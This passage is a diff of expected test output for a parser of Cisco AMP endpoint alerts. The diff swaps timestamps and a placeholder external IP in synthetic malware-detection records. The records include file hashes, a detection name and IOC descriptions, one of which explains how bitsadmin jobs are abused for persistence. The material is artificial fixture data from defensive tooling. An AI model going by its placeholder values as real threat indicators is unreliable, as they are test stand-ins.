@@ -271,8 +271,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322420859Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", + "ingested": "2021-12-09T13:35:29.222420600Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241347137077000,\"timestamp\":1610618799,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-14T10:06:39+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241347137077251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -292,7 +292,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -333,7 +333,7 @@ "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -343,8 +343,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322423196Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", + "ingested": "2021-12-09T13:35:29.222426300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -364,7 +364,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -427,7 +427,7 @@ "cf162622e29bca072d01b274fbbc3ceaacdd13c7" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -444,8 +444,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322425452Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"SqGGuYXyy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\SqGGuYXyy.exe\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", + "ingested": "2021-12-09T13:35:29.222431900Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"SqGGuYXyy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\SqGGuYXyy.exe\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\",\"sha1\":\"cf162622e29bca072d01b274fbbc3ceaacdd13c7\",\"md5\":\"0fe5be3811a98ee6a9c997d3812d911a\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -467,7 +467,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -526,7 +526,7 @@ "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -543,8 +543,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322427749Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT4BBF.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT4BBF.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", + "ingested": "2021-12-09T13:35:29.222437500Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":525000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Overdrive.RET\",\"detection_id\":\"6533241145273614337\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"BIT4BBF.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\BIT4BBF.tmp\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"},\"parent\":{\"process_id\":896,\"disposition\":\"Clean\",\"file_name\":\"svchost.exe\",\"identity\":{\"sha256\":\"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2\",\"sha1\":\"4af001b3c3816b860660cf2de2c0fd3c1dfb4878\",\"md5\":\"54a47f6b5e09a77e61649109c6a08866\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -566,7 +566,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { 
@@ -611,7 +611,7 @@ "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -621,8 +621,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322430017Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", + "ingested": "2021-12-09T13:35:29.222443100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533241145273614000,\"timestamp\":1610618752,\"timestamp_nanoseconds\":619000000,\"date\":\"2021-01-14T10:05:52+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6533241145273614338\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -642,7 +642,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -690,7 +690,7 @@ "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -700,8 +700,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322432281Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739875754000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":875739000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. 
This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.\",\"short_description\":\"W32.WScriptExecuteFakeExtension.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", + "ingested": "2021-12-09T13:35:29.222448800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739875754000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":875739000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. 
This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.\",\"short_description\":\"W32.WScriptExecuteFakeExtension.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"WScript.exe\",\"file_path\":\"/C:/Windows/System32/WScript.exe\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:05:50.000Z", @@ -722,7 +722,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -777,7 +777,7 @@ "838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -787,8 +787,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322434612Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739868158500,\"timestamp\":1610618750,\"timestamp_nanoseconds\":868146000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. 
While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.\",\"short_description\":\"W32.Bitsadmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"bitsadmin.exe\",\"file_path\":\"/C:/Windows/System32/bitsadmin.exe\",\"identity\":{\"sha256\":\"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"}}}}}", + "ingested": "2021-12-09T13:35:29.222454500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739868158500,\"timestamp\":1610618750,\"timestamp_nanoseconds\":868146000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610618750,\"start_date\":\"2021-01-14T10:05:50+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. 
An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.\",\"short_description\":\"W32.Bitsadmin.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"bitsadmin.exe\",\"file_path\":\"/C:/Windows/System32/bitsadmin.exe\",\"identity\":{\"sha256\":\"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0\"}}}}}", "code": "1107296274", "kind": "alert", "start": "2021-01-14T10:05:50.000Z", @@ -809,7 +809,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -864,7 +864,7 @@ "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -874,8 +874,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:13:59.322436881Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1521138739846959000,\"timestamp\":1610618750,\"timestamp_nanoseconds\":846943000,\"date\":\"2021-01-14T10:05:50+00:00\",\"event_type\":\"Cloud 